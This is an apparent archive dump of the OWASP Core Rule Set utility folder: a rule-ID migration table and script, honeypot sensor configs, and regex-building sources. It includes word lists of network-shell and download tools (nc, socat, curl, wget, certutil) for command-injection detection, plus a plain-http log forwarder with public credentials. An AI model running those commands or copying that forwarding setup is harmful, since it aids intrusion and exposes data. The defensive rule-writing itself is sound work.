981183,949150 981184,949160 981185,000000 981186,949170 981187,949180 981188,000000 981189,000000 981190,000000 981191,000000 981192,000000 981193,000000 981194,000000 981195,000000 981196,000000 981197,000000 981198,000000 981199,000000 981200,959100 981201,980100 981202,980110 981203,980120 981204,980130 981205,980140 981219,000000 981220,000000 981221,000000 981222,000000 981223,000000 981224,000000 981227,920110 981228,000000 
981229,000000 981230,000000 981231,942440 981235,000000 981236,000000 981237,000000 981238,000000 981239,000000 981240,942300 981241,942230 981242,942330 981243,942370 981244,942180 981245,942260 981246,942340 981247,942360 981248,942210 981249,942310 981250,942170 981251,942350 981252,942240 981253,942320 981254,942280 981255,942190 981256,942250 981257,942200 981260,942450 981261,942100 981270,942290 981272,942160 981276,942270 981277,942220 981300,000000 981301,000000 981302,000000 981303,000000 981304,000000 981305,000000 981306,000000 981307,000000 981308,000000 981309,000000 981310,000000 981311,000000 981312,000000 981313,000000 981314,000000 981315,000000 981316,000000 981317,000000 981318,942110 981319,942120 981320,942140 981400,000000 981401,000000 981402,000000 981403,000000 981404,000000 981405,000000 981406,000000 981407,000000 990002,913100 990012,000000 990901,913110 990902,913120 999003,000000 999004,000000 999005,000000 999006,000000 999008,000000 999010,000000 999011,000000 9700010,951110 9700011,951120 9700012,951130 9700013,951140 9700014,951150 9700015,951160 9700016,951170 9700017,951180 9700018,951190 9700019,951200 9700020,951210 9700021,951220 9700022,951230 9700023,951240 9700024,951250 9700025,951260 ��������modsecurity-crs-3.3.5/util/crs2-renumbering/README��������������������������������������������������0000664�0000000�0000000�00000002522�14461225151�0021701�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������CRS 2.x to 3.x migration utility ================================ In CRS 3.0, we have renumbered the rules to be more logical and helpful. The new rule file names now correspond with the rule IDs in the file. 
The first rule of a given file is usually 9XX100, then the rules continue in steps of ten. Related rules/siblings follow with a single digit change (9XX101, etc.).

This utility replaces CRS 2 rule IDs with their CRS 3 counterparts. You can use it when migrating your CRS 2 exclusion/.conf files to CRS 3.0 or higher.

Example usage: ./update.py -f your_old_modsec_conf.conf

The renumbered configuration is printed to STDOUT; the file you pass with -f is not modified.

Rules which have been removed in CRS 3 are listed with the new ID 000000 in the CSV file. This means that the former rule is no longer part of CRS 3. If after replacement you find a string 000000 in your config files, you can likely remove that exclusion or special case.

A few CRS 2 IDs are listed twice in the CSV with different CRS 3 IDs (900051 with 910110 and 910120; 970017 with 952110 and 954100). update.py applies only the first pair it reads, so after migrating an exclusion for one of these IDs, check whether the second CRS 3 rule needs the same exclusion.

If you want to create your own tooling for this migration, you can use the file idNumbering.csv in this directory. It lists the old rule IDs of CRS 2.2, together with the corresponding rule IDs in CRS 3.0.

A rule renumbering is painful for all existing installations. But we really think that the rule IDs lacked sense and reason, and we are confident future maintenance will be much easier once this is done. We do not plan to change rule IDs after this. We appreciate your understanding in this matter.
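#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Convert CRS 2.x rule IDs in a configuration file to CRS 3.x numbering.

The old-ID/new-ID pairs are read from the translation CSV that sits next to
this script. The renumbered text is written to STDOUT; the input file is
left unchanged.
"""

from __future__ import print_function

import argparse
import csv
import os
import re
import sys

# The script looks the CSV up as "IdNumbering.csv" while its own error
# message calls it "idNumbering.csv". Accept either spelling so the lookup
# does not depend on the case sensitivity of the file system.
_TRANSLATION_FILE_NAMES = ("IdNumbering.csv", "idNumbering.csv")


def _find_translation_file(directory):
    """Return the path of the ID translation CSV in `directory`, or None."""
    for name in _TRANSLATION_FILE_NAMES:
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate):
            return candidate
    return None


def _load_id_map(csv_path):
    """Read the CSV into a dict mapping each old rule ID to its new rule ID.

    Rows with fewer than two columns are skipped. When an old ID is listed
    more than once, the first pair wins; this matches what the previous
    row-by-row replacement did, because after the first replacement no
    occurrence of the old ID was left for the later row.
    """
    id_map = {}
    with open(csv_path, "rt") as id_csv_file:
        for row in csv.reader(id_csv_file):
            if len(row) < 2:
                continue
            old_id = row[0].strip()
            if old_id:
                id_map.setdefault(old_id, row[1].strip())
    return id_map


def _renumber(text, id_map):
    """Return `text` with every standalone old rule ID replaced by its new ID.

    The files being migrated decide which rules are switched off, so an ID is
    only rewritten when it stands as a whole number. Plain substring
    replacement would also rewrite longer digit strings that merely contain
    an old ID, and the migrated exclusion would then name a different rule.
    All IDs are replaced in a single pass, so a value that was just written
    is never translated a second time.
    """
    if not id_map:
        return text
    alternatives = "|".join(
        re.escape(old_id) for old_id in sorted(id_map, key=len, reverse=True)
    )
    pattern = re.compile(r"(?<![0-9])(?:" + alternatives + r")(?![0-9])")
    return pattern.sub(lambda match: id_map[match.group(0)], text)


def main():
    """Parse the command line, renumber the given file and print the result.

    Exits with status 1 when the translation CSV or the input file cannot be
    found, or when the input file cannot be read.
    """
    # sys.path[0] is the directory of the script being run.
    id_translation_file = _find_translation_file(sys.path[0])
    if id_translation_file is None:
        sys.stderr.write(
            "We were unable to locate the ID translation CSV "
            "(IdNumbering.csv), please place this in the same directory "
            "as this script\n"
        )
        sys.exit(1)

    parser = argparse.ArgumentParser(
        description="A program that takes in an exceptions file "
                    "and renumbers all the ID to match OWASP CRS 3 numbers. "
                    "Output will be directed to STDOUT."
    )
    parser.add_argument("-f", "--file", required=True, action="store",
                        dest="fname", help="the file to be renumbered")
    args = parser.parse_args()

    # The path is passed through as given; encoding it first is not needed
    # by os.path or open() and fails on non-ASCII byte strings in Python 2.
    if not os.path.isfile(args.fname):
        sys.stderr.write(
            "We were unable to find the file you were trying to update "
            "the ID numbers in, please check your path\n"
        )
        sys.exit(1)

    try:
        with open(args.fname, "r") as update_file:
            fcontent = update_file.read()
    except IOError:
        # Report the failure through the exit status as well, so a caller
        # redirecting STDOUT does not mistake an empty result for success.
        sys.stderr.write(
            "There was an error opening the file you were trying to update\n"
        )
        sys.exit(1)

    if fcontent != "":
        print(_renumber(fcontent, _load_id_map(id_translation_file)))


if __name__ == "__main__":
    main()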
�������������������������������������������������������������������������������������������������License The GeoLite databases are distributed under the Creative Commons Attribution-ShareAlike 3.0 Unported License. The attribution requirement may be met by including the following in all advertising and documentation mentioning features of or use of this database: This product includes GeoLite data created by MaxMind, available from http://www.maxmind.com. �������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/honeypot-sensor/���������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021010�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/honeypot-sensor/README.md������������������������������������������������0000664�0000000�0000000�00000001136�14461225151�0022270�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������The purpose of these files is to turn your current ModSecurity host into a pseudo-honeypot sensor by doing the following: 1. Instructs Apache to listen for traffic on multiple unused ports - 8000 - 8080 - 8888 2. Creates Apache virtual host containers to bind to these ports. 3. 
If any traffic is received on these ports, then ModSecurity will inspect the traffic by inheriting any rules specified in the main Apache configuration.
4. ModSecurity's Audit Engine will use the mlogc program to forward the audit log entry onto the ModSecurity Project's central logging server.

modsecurity-crs-3.3.5/util/honeypot-sensor/mlogc-honeypot-sensor.conf

##########################################################################
# Required configuration
#   At a minimum, the items in this section will need to be adjusted to
#   fit your environment. The remaining options are optional.
##########################################################################

# Points to the root of the installation. All relative
# paths will be resolved with the help of this path.
CollectorRoot "/var/log/mlogc"

# ModSecurity Console receiving URI. You can change the host
# and the port parts but leave everything else as is.
# NOTE: this URI is plain http, so the audit log entries (which hold the
# inspected request data) and the sensor credentials below travel to this
# host unencrypted. Confirm that the receiving host is one you intend to
# send audit data to before enabling this sensor.
ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver"

# Sensor credentials
# NOTE: these values ship with the rule set and are therefore public; they
# identify the sensor to the console but do not protect anything.
SensorUsername "honeypot-sensor"
SensorPassword "test1234"

# Base directory where the audit logs are stored.
This can be specified # as a path relative to the CollectorRoot, or a full path. LogStorageDir "data" # Transaction log will contain the information on all log collector # activities that happen between checkpoints. The transaction log # is used to recover data in case of a crash (or if Apache kills # the process). TransactionLog "mlogc-transaction.log" # The file where the pending audit log entry data is kept. This file # is updated on every checkpoint. QueuePath "mlogc-queue.log" # The location of the error log. ErrorLog "mlogc-error.log" # The location of the lock file. LockFile "mlogc.lck" # Keep audit log entries after sending? (0=false 1=true) # NOTE: This is required to be set in SecAuditLog mlogc config if you # are going to use a secondary console via SecAuditLog2. KeepEntries 0 ########################################################################## # Optional configuration ########################################################################## # The error log level controls how much detail there # will be in the error log. The levels are as follows: # 0 - NONE # 1 - ERROR # 2 - WARNING # 3 - NOTICE # 4 - DEBUG # 5 - DEBUG2 # ErrorLogLevel 3 # How many concurrent connections to the server # are we allowed to open at the same time? Log collector uses # multiple connections in order to speed up audit log transfer. # This is especially needed when the communication takes place # over a slow link (e.g. not over a LAN). MaxConnections 10 # How many requests a worker will process before recycling itself. # This is to help prevent problems due to any memory leaks that may # exists. If this is set to 0, then no maximum is imposed. The default # is 1000 requests per worker (the number of workers is controlled by the # MaxConnections limit). MaxWorkerRequests 1000 # The time each connection will sit idle before being reused, # in milliseconds. Increase if you don't want ModSecurity Console # to be hit with too many log collector requests. 
TransactionDelay 50 # The time to wait before initialization on startup in milliseconds. # Increase if mlogc is starting faster then termination when the # sensor is reloaded. StartupDelay 5000 # How often is the pending audit log entry data going to be written # to a file. The default is 15 seconds. CheckpointInterval 15 # If the server fails all threads will back down until the # problem is sorted. The management thread will periodically # launch a thread to test the server. The default is to test # once in 60 seconds. ServerErrorTimeout 60 # The following two parameters are not used yet, but # reserved for future expansion. # KeepAlive 150 # KeepAliveTimeout 300 ���������������������������������������modsecurity-crs-3.3.5/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf�������������������������0000664�0000000�0000000�00000001703�14461225151�0027323�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# # Add in honeypot ports. # - These are common proxy ports used by attackers # - All traffic accepted on these ports are suspicious. # Listen 8000 Listen 8080 Listen 8888 # # Create basic virtual host containers that will forward all traffic received # to the official ModSecurity Project honeypot logging host. # # - You should adjust the Document root location to an empty directory on your server # - Also adjust the path to your local ModSecurity mlogc program and for the # mlogc-honeypot-sensor.conf file. # - Make sure you main SecAuditLogType is set to concurrent mode. 
# ServerName www.example1.com DocumentRoot "/usr/local/apache/honeypot-htdocs" Options none AllowOverride None Order allow,deny Allow from all SecAuditEngine On SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf" �������������������������������������������������������������modsecurity-crs-3.3.5/util/id-range�����������������������������������������������������������������0000664�0000000�0000000�00000000036�14461225151�0017244�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������900000-2999999 2000000-299999 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/join-multiline-rules/����������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021723�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/join-multiline-rules/join.py���������������������������������������������0000775�0000000�0000000�00000002445�14461225151�0
023244�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # # This script reads all the rule files passed on the command line, # and outputs them, with each (multi-line) directive joined as a # single line. # # This can be used to work around a bug in Apache < 2.4.11 in # parsing long configuration directives. # # Usage: # # util/join-multiline-rules/join.py rules/*.conf > rules/rules.conf.joined # # This produces a single 'rules.conf.joined' file that can be included # in buggy Apache versions. It is recommended to keep this file in the # rules/ directory (because it refers to .data files in that directory) # but give it a name not ending in .conf (so the file will not be # included in *.conf and you can re-run the command multiple times # without including its own output). 
# # Example: # # SecRule &TX:paranoia_level "@eq 0" \ # "id:901120,\ # phase:1,\ # pass,\ # nolog,\ # setvar:tx.paranoia_level=1" # # will be outputted as: # # SecRule &TX:paranoia_level "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.paranoia_level=1" # import fileinput, sys for line in fileinput.input(): line = line.strip() if line == '': sys.stdout.write("\n") continue if line[-1] == '\\': sys.stdout.write(line[0:-1]) else: sys.stdout.write(line) sys.stdout.write("\n") ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/���������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020717�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/920600.data����������������������������������������������0000664�0000000�0000000�00000004777�14461225151�0022331�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! The expression generated from this file matches a full HTTP ##! `Accept` header by following the specification as far as ##! 
necessary, while restricting the `charset` parameter ##! to a list of explicitly allowed values. ##! Where possible, the expression matches tokens "loosely", ##! to reduce complexity and the risk of false positives. ##! Specifications: ##! https://httpwg.org/specs/rfc7231.html#request.conneg ##! https://httpwg.org/specs/rfc7230.html ##!^ ^ ##!$ $ ##! Helpers ##!> template non-token-with-dquote-chars (),/:;<=>?![\x5c\]{} ##!> template non-token-chars \"{{non-token-with-dquote-chars}} ##!> template token-chars [^{{non-token-chars}}] ##!> template token-with-dquote-chars [^{{non-token-with-dquote-chars}}] ##!> template type-subtype (?:\*|{{token-chars}}+) ##!> template media-type {{type-subtype}}/{{type-subtype}} ##! list of allowed charsets ##!> assemble (?:"? ##!=> ##!> include allowed-charsets ##!=> \b"?)) ##!=< allowed-charsets ##!< ##! Main assembly ##!> assemble (?:{{media-type}}) ##!=> (?:\s*+;\s*+ ##!=> (?:(?:charset\s*+=\s*+ ##!=> ##!=> allowed-charsets ##! If the first part wasn't a "charset", then ##! anything is allowed here that is not "charset". ##! Note that this doesn't follow the RFC strictly. |(?: ##!=> [^c{{non-token-chars}}]{{token-chars}}* c[^h{{non-token-chars}}]{{token-chars}}* ch[^a{{non-token-chars}}]{{token-chars}}* cha[^r{{non-token-chars}}]{{token-chars}}* char[^s{{non-token-chars}}]{{token-chars}}* chars[^e{{non-token-chars}}]{{token-chars}}* charse[^t{{non-token-chars}}]{{token-chars}}* ##!=> )\s*+=\s*+{{token-with-dquote-chars}}+) ##! Clients like to violate the RFC, be lenient with ##! terminating semi-colons. ;? ##!=> )* ##!=> ##! Multiple "media-range" expressions can be ##! specified, comma separated. 
(?:\s*+,\s*+ ##!=> (?:{{media-type}}) ##!=> (?:\s*+;\s*+ ##!=> (?:(?:charset\s*+=\s*+ ##!=> ##!=> allowed-charsets |(?: ##!=> [^c{{non-token-chars}}]{{token-chars}}* c[^h{{non-token-chars}}]{{token-chars}}* ch[^a{{non-token-chars}}]{{token-chars}}* cha[^r{{non-token-chars}}]{{token-chars}}* char[^s{{non-token-chars}}]{{token-chars}}* chars[^e{{non-token-chars}}]{{token-chars}}* charse[^t{{non-token-chars}}]{{token-chars}}* ##!=> )\s*+=\s*+{{token-with-dquote-chars}}+) ##! Clients like to violate the RFC, be lenient with ##! terminating semi-colons. ;? ##!=> )*)* ##!=> ##!< �modsecurity-crs-3.3.5/util/regexp-assemble/921421.data����������������������������������������������0000664�0000000�0000000�00000002000�14461225151�0022304�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200000 ##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/json" ##! Find Content-Type: application/soap+xml;boundary="application/json" ^[^;\s,]+[;\s,].*?application\/json ##! Attacks attempting bypass by forcing JSON body processor leveraging recommended rule 200006 ##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/some.vendor+json" ##! Find Content-Type: application/soap+xml;boundary="application/some.vendor+json" ^[^;\s,]+[;\s,].*?application\/.+[+]json ##! Attacks attempting bypass by forcing XML body processor leveraging recommended rule 200001 ##! Find Content-Type: application/x-www-form-urlencoded;boundary="application/xml" ##! 
Find Content-Type: application/json;boundary="application/soap+xml" ^[^;\s,]+[;\s,].*?(?:application(?:\/soap\+|\/)|text\/)xml modsecurity-crs-3.3.5/util/regexp-assemble/921422.data����������������������������������������������0000664�0000000�0000000�00000001071�14461225151�0022314�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! Attacks attempting to bypass content-type restrictions or behaviour ##! Find Content-Type: application/x-www-form-urlencoded;boundary="multipart/form-data" ##! Find Content-Type: application/soap-xml;boundary="multipart/form-data" ^[^;\s,]+[;\s,].*?\b(text|multipart|application)\b ^[^;\s,]+[;\s,].*?\b(audio|image|video|csv|css|vnd|pdf|plain|json|soap|xml|x-www-form-urlencoded|form-data|related|x-amf|octet|stream|csp|report)\b ^[^;\s,]+[;\s,].*?\b(\/|\+)\b 
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/922110-chain1.data���������������������������������������0000664�0000000�0000000�00000005270�14461225151�0023455�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! The expression generated from this file matches a full HTTP ##! `Accept` header by following the specification as far as ##! necessary, while restricting the `charset` parameter ##! to a list of explicitly allowed values. ##! Where possible, the expression matches tokens "loosely", ##! to reduce complexity and the risk of false positives. ##! Specifications: ##! https://httpwg.org/specs/rfc7231.html#request.conneg ##! https://httpwg.org/specs/rfc7230.html ##! This is a duplicate of the 920600.data file. ##! There will be support for inclusion in the regexp_assemble tool in the future. ##! In the meantime, please keep both files in sync. ##!^ ^ ##!$ $ ##! 
Helpers ##!> template non-token-with-dquote-chars (),/:;<=>?![\x5c\]{} ##!> template non-token-chars \"{{non-token-with-dquote-chars}} ##!> template token-chars [^{{non-token-chars}}] ##!> template token-with-dquote-chars [^{{non-token-with-dquote-chars}}] ##!> template type-subtype (?:\*|{{token-chars}}+) ##!> template media-type {{type-subtype}}/{{type-subtype}} ##! list of allowed charsets ##!> assemble (?:"? ##!=> ##!> include allowed-charsets ##!=> \b"?)) ##!=< allowed-charsets ##!< ##! Main assembly ##!> assemble (?:{{media-type}}) ##!=> (?:\s*+;\s*+ ##!=> (?:(?:charset\s*+=\s*+ ##!=> ##!=> allowed-charsets ##! If the first part wasn't a "charset", then ##! anything is allowed here that is not "charset". ##! Note that this doesn't follow the RFC strictly. |(?: ##!=> [^c{{non-token-chars}}]{{token-chars}}* c[^h{{non-token-chars}}]{{token-chars}}* ch[^a{{non-token-chars}}]{{token-chars}}* cha[^r{{non-token-chars}}]{{token-chars}}* char[^s{{non-token-chars}}]{{token-chars}}* chars[^e{{non-token-chars}}]{{token-chars}}* charse[^t{{non-token-chars}}]{{token-chars}}* ##!=> )\s*+=\s*+{{token-with-dquote-chars}}+) ##! Clients like to violate the RFC, be lenient with ##! terminating semi-colons. ;? ##!=> )* ##!=> ##! Multiple "media-range" expressions can be ##! specified, comma separated. (?:\s*+,\s*+ ##!=> (?:{{media-type}}) ##!=> (?:\s*+;\s*+ ##!=> (?:(?:charset\s*+=\s*+ ##!=> ##!=> allowed-charsets |(?: ##!=> [^c{{non-token-chars}}]{{token-chars}}* c[^h{{non-token-chars}}]{{token-chars}}* ch[^a{{non-token-chars}}]{{token-chars}}* cha[^r{{non-token-chars}}]{{token-chars}}* char[^s{{non-token-chars}}]{{token-chars}}* chars[^e{{non-token-chars}}]{{token-chars}}* charse[^t{{non-token-chars}}]{{token-chars}}* ##!=> )\s*+=\s*+{{token-with-dquote-chars}}+) ##! Clients like to violate the RFC, be lenient with ##! terminating semi-colons. ;? 
##!=> )*)* ##!=> ##!< ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/include/�������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0022342�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/include/allowed-charsets.data����������������������������0000664�0000000�0000000�00000000360�14461225151�0026435�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regexp_assemble/. ##! This list is in sync with the default value of tx.allowed_request_content_type_charset. 
iso-8859-1 iso-8859-15 utf-8 windows-1252 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932100.txt����������������������������������������0000664�0000000�0000000�00000003431�14461225151�0023507�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932100 (RCE Unix command injection part 1/3) # # To convert to a regexp that can be pasted into the rule: # cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). Example: # # diff+ # Special regexp case for the '.' 
(source) command to prevent FP: '\.\s.* 7z 7za 7zr adduser alias+ apt-get arch+ arp awk+ bash batch+ breaksw bsdcat bsdiff bsdtar builtin bzcat bzdiff bzegrep bzfgrep bzgrep bzip2 bzless bzmore cat+ cc+ chattr chdir+ chflags chmod command+ compress+ coproc cp+ crontab csh curl dash dhclient diff+ dmesg doas done dpkg du+ echo+ egrep endif endsw env env-update esac eval exec+ expand export expr fc+ fetch+ fgrep fi file+ filetest find+ foreach ftp+ ftpstats ftpwho function gcc+ gdb GET+ getfacl+ git+ grep+ gunzip gzcat gzip head+ history hostid hostname htdigest htpasswd hup+ # 'id' causes way too much FP, so we require whitespace; this will allow # injecting ';id' unfortunately. id+ ifconfig ip6tables ipconfig iptables irb irb1 irb18 irb19 irb20 irb21 irb22 java+ jexec jobs+ kill+ killall last+ lastcomm lastlog lastlogin ldconfig ldd+ less+ lessecho lessfile lesspipe lftp lftpget ln+ local+ locate+ logname lp+ ls ls-F lsb_release lscpu lshw lsmod lsof lspci lsusb lwp-download lwp-dump lwp-mirror lwp-request lynx+ lzcat lzcmp lzdiff lzegrep lzfgrep lzgrep lzless lzma lzmore mailq mailx+ mkdir+ mlocate more+ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932105.txt����������������������������������������0000664�0000000�0000000�00000003431�14461225151�0023514�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932105 (RCE Unix command injection part 2/3) # # To convert to a regexp that can be pasted into the rule: # cat 
regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some false positives (FP) for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). Example: # # diff+ mount+ mutt+ mv+ mysql mysqladmin mysqldump mysqldumpslow mysqlhotcopy mysqlshow nano+ nc+ nc.openbsd nc.traditional ncat net+ netcat netkit-ftp netstat nice+ nmap nohup nping nslookup nstat onintr openssl passwd patch+ perl perl5 perlsh perms pftp pgrep php php5 php7 ping pkexec pkg pkg_info pkginfo pkill popd printenv printf+ ps+ ptar ptardiff ptargrep pushd python python2 python3 python3m rar+ rcp+ realpath rename+ repeat+ replace+ rm+ rmdir+ rmuser rnano route rpm+ rsync ruby ruby1 ruby18 ruby19 ruby20 ruby21 ruby22 sched scp+ sdiff sed+ sendmail set+ setenv setfacl+ setsid sftp sh+ sh.distrib shutdown sleep socat sort+ source+ ssh strings su+ sudo svn sysctl tail tailf tar+ tcping tcptraceroute tcsh tee+ telnet time+ timeout top touch+ traceroute traceroute6 ulimit+ uname uncompress unlink+ unlzma unrar unset unxz unzip useradd userdel usermod vigr vim+ vipw w3m wget # 'who' causes many FP, so require whitespace. # Unfortunately, a bare 'who' without trailing whitespace is then not matched # by this list and may still leak some info (the bare word is listed in # regexp-932106.txt). 
who+ whoami xargs xterm xxd+ xz+ xzcat xzcmp xzdec xzdiff xzegrep xzfgrep xzgrep xzless xzmore yum zcat zcmp zdiff zegrep zfgrep zgrep zip+ zless zmore zrun zsh ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932106.txt����������������������������������������0000664�0000000�0000000�00000001307�14461225151�0023515�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932106 (RCE Unix command injection part 3/3) # # To convert to a regexp that can be pasted into the rule: # cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). 
Example: # # diff+ vi+ ps pwd who w+ aptitude+ pacman+ dnf+ up2date+ �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932110.txt����������������������������������������0000664�0000000�0000000�00000003357�14461225151�0023517�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932110 (RCE Windows command injection part 1/2) # # To convert to a regexp that can be pasted into the rule: # cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # # Entries starting with ' are used verbatim. # Everything after # is a comment. # # To prevent some FP for a command, you can require command parameters # after a command. Only do this if the command regularly causes FP and if # allowing the bare command (without parameters) is not too dangerous. # (Note: due to \b following the regexp, a word boundary is also required # further on, so some letter/number is needed for a match). 
Example: # # diff@ 7z 7za 7zr addusers admodcmd arp@ assoc attrib azman bcdboot bcdedit bitsadmin bootcfg browstat cacls call@ certreq certutil #disabled for FP: change chdir@ chkdsk chkntfs cipher cleanmgr clearmem cluster cmd cmdkey comexp comp@ compact@ compmgmt con2prt convert copy csccmd cscript csvde curl date@ dcomcnfg debug defrag del@ delprof deltree devcon devmgmt diff@ dir@ diruse diskmgmt diskpart diskshadow dnsstat doskey driverquery dsacls dsadd dsget dsmod dsmove dsquery dsrm dxdiag echo egrep endlocal erase eventcreate eventvwr expand@ explorer fc@ fgrep find@ findstr foreach forfiles format@ freedisk fsmgmt fsutil ftp@ ftype gathernetworkinfo getmac git@ gpedit gpresult gpupdate hdwwiz hostname icacls ifmember inetcpl ipconfig irb irb1 irb18 irb19 irb20 irb21 irb22 java@ label@ logevent logman logoff logtime lusrmgr mapisend mbsacli md@ mdsched measure mkdir@ mklink mmsys mode@ more@ mount@ mountvol moveuser msconfig msg@ msiexec msinfo32 mstsc mysql mysqladmin mysqldump mysqldumpslow mysqlhotcopy mysqlshow nbtstat nc@ ncat net@ netcat netdom netsh netstat netsvc nmap nslookup ntbackup ntrights ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-932115.txt����������������������������������������0000664�0000000�0000000�00000003536�14461225151�0023523�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# Word list for rule 932115 (RCE Windows command injection part 2/2) # # To convert 
